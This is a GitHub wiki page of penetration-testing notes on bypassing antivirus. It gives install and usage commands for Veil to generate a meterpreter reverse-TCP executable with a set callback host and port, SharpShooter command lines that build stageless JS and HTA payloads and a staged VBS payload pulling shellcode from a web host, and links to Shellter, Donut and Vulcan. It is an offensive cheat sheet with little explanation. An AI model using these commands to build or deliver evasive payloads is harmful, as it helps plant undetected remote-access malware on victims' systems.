Skip to content

Bypassing AV

Jump to bottom
TheGetch edited this page Jan 5, 2021 · 1 revision

Bypassing AV

Bypassing AV

Veil Framework:

Install on Kali:

  • apt install veil
  • /usr/share/veil/config/setup.sh --force --silent

Reference: https://github.com/Veil-Framework/Veil

Generate exe example:

$ veil
> use 1 (Evasion)
> use 11 (cs/meterpreter/rev_tcp)
> set LPORT 4442
> set LHOST 10.52.252.94
> set USE_ARYA Y
> generate
$ ls /var/lib/veil/output/compiled/

Shellter

Source: https://www.shellterproject.com/download/

  • apt install shellter

Sharpshooter

Javascript Payload Stageless:

  • SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

Stageless HTA Payload:

  • SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

Staged VBS:

  • SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

Reference: https://github.com/mdsecactivebreach/SharpShooter

Donut:

Source: https://github.com/TheWover/donut

Vulcan

Source: https://github.com/praetorian-code/vulcan

_Sidebar

Home

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Enumeration General Notes

Host/Port Scanning

Services

01. FTP (21)

02. SSH (22)

03. SMTP (25)

04. DNS (53)

05. HTTP (80,443,8080,8443,etc.)

06. POP3 (110)

07. SMB (139,445)

08. SNMP (161,162)

09. LDAP (389)

10. MS-SQL or MySQL (1433,3306)

11. RDP (3389)

12. Winrm (5985)

13. Memcache (11221)

3. Exploitation

Exploitation General Notes

4. Post Exploiation

Post Exploitation General Notes

Editable Service

Privilege Escalation

Scheduled Jobs/Tasks

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally